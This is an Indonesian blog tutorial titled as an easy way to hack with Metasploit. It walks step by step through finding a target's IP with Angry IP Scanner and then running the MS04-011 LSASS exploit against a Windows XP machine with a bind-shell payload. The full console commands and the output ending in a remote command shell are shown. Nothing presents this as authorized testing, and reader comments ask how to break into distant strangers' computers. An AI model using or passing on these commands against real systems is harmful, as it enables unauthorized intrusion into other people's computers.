Cara Mudah Hack dengan Metasploit Framework

Untuk cara hacking yang satu ini, kita membutuhkan komputer yang sudah terinstall metasploit framework dan software angry ip untuk menentukan target. Dan apabila anda belum mempunyai software-software tersebut anda dapat mendownloadnya di halaman download software asik yang telah saya postingkan sebelumnya.

Bagaimana..??? Udah punya softwarenya...??? Lanjut nih..!!!!

Ok..!!! Langkah pertama kita siapkan target kita. Untuk mengetahui IP target kita gunakan software Angry IP

Sudah mendapatkan IP calon target...!!! sekarang kita tinggal menggunakan software mantap kita nih Metasploit..!!!!

1. Jalankan Programnya..!!!


2. Lanjut..teken tombol CTRL+O untuk masuk ke konsolnya..
3. maka akan muncul konsol seperti ini

_
| | o
_ _ _ _ _|_ __, , _ | | __ _|_
/ |/ |/ | |/ | / | / \_|/ \_|/ / \_| |
| | |_/|__/|_/\_/|_/ \/ |__/ |__/\__/ |_/|_/
/|
\|

=[ msf v3.1-release
+ -- --=[ 262 exploits - 117 payloads
+ -- --=[ 17 encoders - 6 nops
=[ 46 aux

msf >


4. lihat semua exploit yg ada...(tuk melihat semua menu yang disediakan metasploit) msf > show exploits

5. load modul exploit, kita gunain exploit lsass spt cara diatas

msf > use windows/smb/ms04_011_lsass

6. Tentukan sistem operasi target... misal target menggunakan XP

maka targetnya sepeti berikut

msf exploit(ms04_011_lsass) > set target 2

target => 2

7. Tampilkan payloadnya apa aja yg ada..

msf exploit(ms04_011_lsass) > show payloads

8. karena kita akan masuk ke konsol, kita pilih payload generic/shell_bind_tcp

msf exploit(ms04_011_lsass) > set payload generic/shell_bind_tcp

payload => generic/shell_bind_tcp

9. Sekarang kita masukan IP si target yang telah kita dapat dari hasil scan angry IP...misal ip si target 192.168.113.14

msf exploit(ms04_011_lsass) > set RHOST 192.168.113.14
RHOST => 192.168.113.14

10. Udah dech...tinggal jalanin perintah exploit...

msf exploit(ms04_011_lsass) > exploit
[*] Started bind handler
[*] Binding to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Bound to 3919286a-b10c-11d0-9ba8-00c04fd92ef5:0.0@ncacn_np:192.168.113.14[\lsarpc]...
[*] Getting OS information...
[*] Trying to exploit Windows 5.1
[*] Command shell session 3 opened (192.168.113.25:8471 -> 192.168.113.14:4444)
[*] The DCERPC service did not reply to our request

lihat di sana ada tulisan Command shell session 3 opened...ini menandakan qta sudah berhasil msk...dan shell kita di simpan di session 3.

11. Selanjutnya kita tampilin...isi session kita

msf exploit(ms04_011_lsass) > sessions -l

Active sessions
===============

Id Description Tunnel
-- ----------- ------
3 Command shell 192.168.113.25:8471 -> 192.168.113.14:4444

12. Udah itu...kita masuk ke session 3 tersebut, untuk masuk ke konsol....

msf exploit(ms04_011_lsass) > sessions -i 3

[*] Starting interaction with 3...

Microsoft Windows XP [Version 5.1.2600]

(C) Copyright 1985-2001 Microsoft Corp.

C:\WINDOWS\system32>


Gimana bisa gak..??? di metasploit banyak menu hack pilihan tergantung kelemahan dari target kita..!!! jadi klo gak bisa pake cara diatas jangan malu untuk mencoba cara lain.. sesuaikan dengan kebutuhan kamu...!!!!

Dan disini saya juga hanyalah seorang pemula jadi apabila ada kesalahan mohon dikonfirmasi sehingga dapat saya perbaiki..!!!




4 comments

Wah memang hack dengan metasploit framework itu paling asik. gak pake ribet tapi yahut.

makasih benk.

Reply

kalau router mikrotik target kita dimasukkan dalam kstegori os apa ya...?
makasih...

Reply

klo melakukan exploit terhadap komputer orang lain yang tidak tersambung LAN bisa apa tidak, misalnya 2 komputer yang online,

terus bagaimana caranya masuk ke komputer orang lain yang hanya sama2 online, dalam lokasi yang cukup jauh. mohon pemberitaunanya,,,,,
mohon pencerahannya dikirimkan ke email : bobteler@yahoo.com

Reply

seep keren banget..
d blog gw cm ilmu tentang virus kbnyakan...
hehe..
http://haikaladli.blogspot.com
thnks ya bnyk tutorial blognya jg

Reply

Post a Comment